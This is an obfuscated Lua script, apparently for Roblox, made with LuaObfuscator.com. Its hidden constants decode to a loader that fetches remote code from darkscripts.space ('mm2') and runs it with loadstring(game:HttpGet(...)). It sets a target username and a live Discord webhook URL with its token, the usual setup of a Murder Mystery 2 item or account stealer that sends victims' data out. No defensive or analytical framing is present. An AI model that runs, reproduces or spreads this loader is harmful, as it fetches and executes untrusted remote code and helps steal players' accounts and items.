--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then local v80=0;while true do if (v80==0) then v19=v0(v3(v30,1,1));return "";end end else local v81=0;local v82;while true do if (v81==0) then v82=v2(v0(v30,16));if v19 then local v108=v5(v82,v19);v19=nil;return v108;else return v82;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v83=(v31/((5 -3)^(v32-(2 -1))))%((3 -(878 -(282 + 595)))^(((v33-(2 -(1638 -(1523 + 114)))) -(v32-(620 -(555 + 64)))) + (932 -(857 + 74)))) ;return v83-(v83%(569 -(367 + 181 + 20))) ;else local v84=2^(v32-(928 -(214 + 713))) ;return (((v31%(v84 + v84))>=v84) and (1 + 0)) or (0 + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (2 -0) );v18=v18 + 2 ;return (v36 * (1321 -(68 + 997))) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + 3 );v18=v18 + (1274 -(226 + 1044)) ;return (v40 * (73054774 -56277558)) + (v39 * (65653 -(32 + 19 + 66))) + (v38 * (251 + 5)) + v37 ;end local function v24() local v41=v23();local v42=v23();local v43=958 -(892 + 65) ;local v44=(v20(v42,2 -1 ,36 -16 ) * ((3 -1)^32)) + v41 ;local v45=v20(v42,371 -(87 + 263) ,211 -(67 + 113) );local v46=((v20(v42,24 + 8 )==(2 -1)) and  -1) or ((1188 -(1069 + 118)) + (0 -0)) ;if (v45==(0 -0)) then if (v44==0) then return v46 * 0 ;else v45=953 -(802 + 150) ;v43=0 -(0 -0) ;end elseif (v45==2047) then return ((v44==(0 -0)) and (v46 * ((1 + 0)/((174 + 823) -(915 + 82))))) or (v46 * NaN) ;end return v8(v46,v45-(2896 -1873) ) * (v43 + (v44/((2 + 0)^(68 -16)))) ;end local function v25(v47) local v48;if  not v47 then v47=v23();if (v47==(0 -0)) then return "";end end v48=v3(v16,v18,(v18 + v47) -1 );v18=v18 + v47 ;local v49={};for v64=1, #v48 do v49[v64]=v2(v1(v3(v48,v64,v64)));end return v6(v49);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v50=(function() return 0;end)();local v51=(function() return;end)();local v52=(function() return;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();while true do if (v50==0) then local v87=(function() return 0 -0 ;end)();while true do if (v87~=(262 -(241 + 20))) then else v53=(function() return {};end)();v50=(function() return 1;end)();break;end if (v87==0) then v51=(function() return function(v110,v111,v112) local v113=(function() return 0 -0 ;end)();local v114=(function() return;end)();while true do if (v113==0) then v114=(function() return 0;end)();while true do if (v114~=(0 + 0)) then else local v169=(function() return 0;end)();while true do if (v169~=0) then else v110[v111-#"~" ]=(function() return v112();end)();return v110,v111,v112;end end end end break;end end end;end)();v52=(function() return {};end)();v87=(function() return 439 -(262 + 176) ;end)();end end end if (v50==3) then for v90= #"/",v23() do local v91=(function() return v21();end)();if (v20(v91, #",", #"}")==(1721 -(345 + 1376))) then local v103=(function() return 0;end)();local v104=(function() return;end)();local v105=(function() return;end)();local v106=(function() return;end)();local v107=(function() return;end)();while true do if (v103~=(689 -(198 + 490))) then else local v115=(function() return 0 -0 ;end)();local v116=(function() return;end)();while true do if (v115~=(0 -0)) then else v116=(function() return 0;end)();while true do if (v116==(1206 -(696 + 510))) then v106=(function() return nil;end)();v107=(function() return nil;end)();v116=(function() return 1;end)();end if (v116==1) then v103=(function() return 3 -1 ;end)();break;end end break;end end end if (v103==0) then local v117=(function() return 0;end)();local v118=(function() return;end)();while true do if (v117==(1262 -(1091 + 171))) then v118=(function() return 0 + 0 ;end)();while true do if (v118~=(3 -2)) then else v103=(function() return 1;end)();break;end if (v118==0) then v104=(function() return 0 -0 ;end)();v105=(function() return nil;end)();v118=(function() return 375 -(123 + 251) ;end)();end end break;end end end if (v103~=2) then else while true do if (v104== #"19(") then if (v20(v106, #"91(", #"91(")== #"~") then v107[ #".com"]=(function() return v57[v107[ #"0313"]];end)();end v52[v90]=(function() return v107;end)();break;end if (v104~=0) then else local v125=(function() return 0 -0 ;end)();while true do if (v125==(698 -(208 + 490))) then v105=(function() return v20(v91,1 + 1 , #"-19");end)();v106=(function() return v20(v91, #"?id=",6);end)();v125=(function() return 1;end)();end if (v125~=(1 + 0)) then else v104=(function() return  #":";end)();break;end end end if (v104==2) then local v126=(function() return 0;end)();while true do if (0~=v126) then else if (v20(v106, #"[", #" ")== #">") then v107[2]=(function() return v57[v107[2]];end)();end if (v20(v106,2,2)== #"{") then v107[ #"91("]=(function() return v57[v107[ #"xnx"]];end)();end v126=(function() return 837 -(660 + 176) ;end)();end if (1==v126) then v104=(function() return  #"gha";end)();break;end end end if (v104~= #"!") then else local v127=(function() return 0;end)();while true do if (v127~=1) then else v104=(function() return 2;end)();break;end if (v127~=0) then else v107=(function() return {v22(),v22(),nil,nil};end)();if (v105==(0 + 0)) then local v178=(function() return 202 -(14 + 188) ;end)();local v179=(function() return;end)();while true do if (v178==(675 -(534 + 141))) then v179=(function() return 0 + 0 ;end)();while true do if (v179==(0 + 0)) then v107[ #"gha"]=(function() return v22();end)();v107[ #"http"]=(function() return v22();end)();break;end end break;end end elseif (v105== #"!") then v107[ #"91("]=(function() return v23();end)();elseif (v105==(2 + 0)) then v107[ #"91("]=(function() return v23() -((3 -1)^(25 -9)) ;end)();elseif (v105== #"xnx") then local v190=(function() return 0 -0 ;end)();local v191=(function() return;end)();while true do if (v190~=0) then else v191=(function() return 0 + 0 ;end)();while true do if (v191~=(0 + 0)) then else v107[ #"91("]=(function() return v23() -((398 -(115 + 281))^16) ;end)();v107[ #"?id="]=(function() return v22();end)();break;end end break;end end end v127=(function() return 1;end)();end end end end break;end end end end for v92= #".",v23() do v53,v92,v28=(function() return v51(v53,v92,v28);end)();end return v55;end if (v50~=(2 -1)) then else local v88=(function() return 0;end)();while true do if (v88==(1 + 0)) then v56=(function() return v23();end)();v50=(function() return 2;end)();break;end if (v88==(0 -0)) then v54=(function() return {};end)();v55=(function() return {v52,v53,nil,v54};end)();v88=(function() return 1;end)();end end end if (2==v50) then v57=(function() return {};end)();for v93= #",",v56 do local v94=(function() return 0;end)();local v95=(function() return;end)();local v96=(function() return;end)();while true do if (v94==0) then v95=(function() return v21();end)();v96=(function() return nil;end)();v94=(function() return 1;end)();end if (v94~=1) then else if (v95== #"<") then v96=(function() return v21()~=(0 -0) ;end)();elseif (v95==2) then v96=(function() return v24();end)();elseif (v95== #"91(") then v96=(function() return v25();end)();end v57[v93]=(function() return v96;end)();break;end end end v55[ #"gha"]=(function() return v21();end)();v50=(function() return 870 -(550 + 317) ;end)();end end end local function v29(v58,v59,v60) local v61=v58[1];local v62=v58[2 -0 ];local v63=v58[3 -0 ];return function(...) local v66=v61;local v67=v62;local v68=v63;local v69=v27;local v70=2 -1 ;local v71= -(286 -(134 + 151));local v72={};local v73={...};local v74=v12("#",...) -(1 -0) ;local v75={};local v76={};for v85=1990 -(582 + 1408) ,v74 do if (v85>=v68) then v72[v85-v68 ]=v73[v85 + 1 ];else v76[v85]=v73[v85 + (3 -2) ];end end local v77=(v74-v68) + (1 -0) ;local v78;local v79;while true do local v86=0 -0 ;while true do if (v86==(1824 -(1195 + 629))) then v78=v66[v70];v79=v78[1 -0 ];v86=242 -(187 + 54) ;end if (v86==(781 -(162 + 618))) then if ((v79<=(1432 -(41 + 1386))) or (1430>=3612)) then if (v79<=2) then if ((2683>=2460) and (v79<=((103 -(17 + 86)) + 0))) then v76[v78[2 + 0 ]]();elseif (v79>((1 + 0) -0)) then if (v76[v78[(3 -1) -(0 -0) ]]==v78[1 + 3 ]) then v70=v70 + 1 ;else v70=v78[1639 -(1373 + 263) ];end else v76[v78[1002 -(451 + (715 -(122 + 44))) ]]=v60[v78[3]];end elseif ((v79<=(1 + 2)) or (1804>=3275)) then v70=v78[4 -(1 -0) ];elseif (v79>(6 -2)) then v60[v78[1387 -(746 + 638) ]]=v76[v78[1 + 1 ]];v70=v70 + (1 -0) ;v78=v66[v70];v76[v78[(1137 -794) -(218 + 123) ]]=v78[3];v70=v70 + (1582 -(1535 + 46)) ;v78=v66[v70];v60[v78[3 + 0 ]]=v76[v78[2]];v70=v70 + 1 + 0 ;v78=v66[v70];v76[v78[2]]=v78[563 -(306 + 254) ];v70=v70 + 1 ;v78=v66[v70];v70=v78[1 + 2 ];else v76[v78[3 -1 ]]=v78[1470 -(732 + 167 + 83 + 485) ];end elseif (v79<=(6 + 2)) then if (v79<=(14 -8)) then v60[v78[(1227 -621) -(268 + 335) ]]=v76[v78[2]];elseif ((v79==(297 -(60 + 230))) or (1417>3629)) then local v141=0;local v142;local v143;local v144;local v145;while true do if (v141==(573 -(426 + (211 -(30 + 35))))) then v71=(v144 + v142) -(1 + 0 + 0) ;v145=1456 -(282 + (2431 -(1043 + 214))) ;v141=813 -(569 + 242) ;end if ((0 -0)==v141) then v142=v78[1 + 1 ];v143,v144=v69(v76[v142](v13(v76,v142 + 1 ,v78[1027 -(706 + 318) ])));v141=1252 -((2725 -2004) + (1742 -(323 + 889))) ;end if (v141==(1273 -(945 + (876 -550)))) then for v180=v142,v71 do local v181=0 -0 ;while true do if (v181==((580 -(361 + 219)) + (320 -(53 + 267)))) then v145=v145 + 1 ;v76[v180]=v143[v145];break;end end end break;end end else local v146;local v147,v148;local v149;local v150;v76[v78[2]]=v60[v78[3]];v70=v70 + (701 -(271 + 429)) ;v78=v66[v70];v150=v78[2 + 0 ];v149=v76[v78[3]];v76[v150 + (1501 -(1408 + 92)) ]=v149;v76[v150]=v149[v78[1090 -(105 + 356 + 625) ]];v70=v70 + ((1702 -(15 + 398)) -(993 + 295)) ;v78=v66[v70];v76[v78[1 + 1 ]]=v78[(2156 -(18 + 964)) -(418 + 753) ];v70=v70 + (3 -2) + 0 ;v78=v66[v70];v150=v78[1 + 1 ];v147,v148=v69(v76[v150](v13(v76,v150 + 1 ,v78[1 + 2 ])));v71=(v148 + v150) -(1 + 0) ;v146=0;for v171=v150,v71 do local v172=(307 + 222) -(406 + 123) ;while true do if ((4795>402) and (v172==(1769 -(1749 + 20)))) then v146=v146 + 1 ;v76[v171]=v147[v146];break;end end end v70=v70 + 1 + 0 ;v78=v66[v70];v150=v78[1324 -(1249 + 73) ];v76[v150]=v76[v150](v13(v76,v150 + 1 + 0 ,v71));v70=v70 + 1 ;v78=v66[v70];v76[v78[1147 -(294 + 172 + 679) ]]();v70=v70 + 1 ;v78=v66[v70];v70=v78[6 -(853 -(20 + 830)) ];end elseif ((4813>3565) and (v79<=((20 + 5) -16))) then local v122=v78[1902 -(106 + 1794) ];v76[v122]=v76[v122](v13(v76,v122 + 1 + 0 ,v71));elseif (v79>(3 + (133 -(116 + 10)))) then do return;end else local v164=v78[2];local v165=v76[v78[8 -5 ]];v76[v164 + (2 -1) ]=v165;v76[v164]=v165[v78[118 -(1 + 3 + 110) ]];end v70=v70 + (585 -(57 + (1265 -(542 + 196)))) ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031D3O00682O7470733A2O2F6461726B736372697074732E73706163652F2O6D3203083O00557365726E616D65030B3O00436F796C6973745F31353803073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31322O38313036333833363934322O333635332F7843506850324C615A6E49675F4D444152684E564A4F6B3746486D4C4E46704155396A6E696C5943446C6175467A6F744D70742D5534754D56663562776378696B546F4300143O0012043O00013O0026023O000B000100020004033O000B0001001201000100033O001208000200043O00202O00020002000500122O000400066O000200046O00013O00024O00010001000100044O001300010026023O0001000100010004033O00010001001204000100083O001205000100073O00122O0001000A3O00122O000100093O00124O00023O00044O000100012O000B3O00017O00",v9(),...);
